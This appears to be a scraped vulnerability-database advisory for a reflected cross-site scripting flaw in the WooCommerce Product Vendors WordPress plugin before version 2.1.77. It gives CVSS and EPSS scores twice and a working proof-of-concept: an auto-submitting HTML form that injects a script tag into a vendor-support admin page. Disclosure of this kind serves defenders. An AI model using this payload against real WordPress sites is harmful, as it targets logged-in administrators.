Lucene search

K
wpexploitWpvulndbWPEX-ID:FB6DFD45-B5DD-40BD-BD23-4945FC00E4B9
HistoryJun 21, 2023 - 12:00 a.m.

WooCommerce Product Vendors < 2.1.77 - Reflected XSS

2023-06-2100:00:00
wpvulndb
62
woocommerce
product vendors
xss
admin page
reflected

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.0005 Low

EPSS

Percentile

14.0%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the code below

html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=wcpv-vendor-support" method="POST">
      <input type="hidden" name="vendor&#95;question" value="<&#47;textarea><script>alert&#40;/XSS/&#41;&#59;<&#47;script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.0005 Low

EPSS

Percentile

14.0%

Related for WPEX-ID:FB6DFD45-B5DD-40BD-BD23-4945FC00E4B9